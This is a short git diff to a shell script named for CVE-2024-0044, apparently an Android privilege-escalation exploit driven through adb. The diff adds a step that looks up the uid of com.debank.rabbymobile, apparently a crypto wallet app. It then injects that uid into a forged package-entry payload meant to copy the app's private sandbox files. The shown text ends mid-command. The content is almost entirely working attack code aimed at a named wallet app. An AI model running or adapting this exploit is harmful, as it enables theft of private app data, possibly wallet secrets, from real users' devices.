diff --git a/CVE-2024-0044.sh b/CVE-2024-0044.sh index d2381fc..40bffe4 100644 --- a/CVE-2024-0044.sh +++ b/CVE-2024-0044.sh @@ -29,8 +29,11 @@ adb shell "mkdir -p /data/local/tmp/tempqazmkp/ && touch /data/local/tmp/tempqaz # 推送任意APK文件到设备临时目录 adb push $APK_PATH /data/local/tmp/tempqazmkp/any.apk +# 获取 package的uid +PACKAGEUID=$(adb shell "pm list packages -U | grep com.debank.rabbymobile" | awk -F 'uid:' '{print $2}') + PAYLOAD="@null -victim 10149 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null" +victim $PACKAGEUID 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null" # 提权并拷贝沙箱文件到指定位置 adb shell <